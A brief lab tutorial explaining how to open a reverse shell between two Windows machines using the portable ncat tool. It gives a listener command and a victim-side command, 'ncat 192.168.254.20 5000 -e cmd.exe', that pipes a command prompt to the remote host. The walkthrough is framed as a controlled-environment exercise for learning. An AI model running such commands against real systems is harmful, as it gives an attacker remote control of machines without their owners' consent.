The purpose of this article is to put together a step by step on how to perform a reverse shell using the netcat tool from nmap. This walk through is in a controlled environment where we have complete control.
The files above can be found http://nmap.org/dist/ncat-portable-5.59BETA1.zip. this is a portable edition only ncat.exe is required.
the diagram illustrates the connectivity.
- The actor machine should have the following syntax running in the administrator command prompt “ncat -lvp 5000” see screenshot below
- The victim machine should have the following syntax running in the command prompt “ncat 192.168.254.20 5000 -e cmd.exe” note: the ip address 192.168.254.20 is whatever your actor machine is and see screenshot below
Once you have an established connection the server side will go to a prompt and you can then issue commands like you were on the machine itself. A good command
to test with is hostname it will tell you the name of the machine you are on.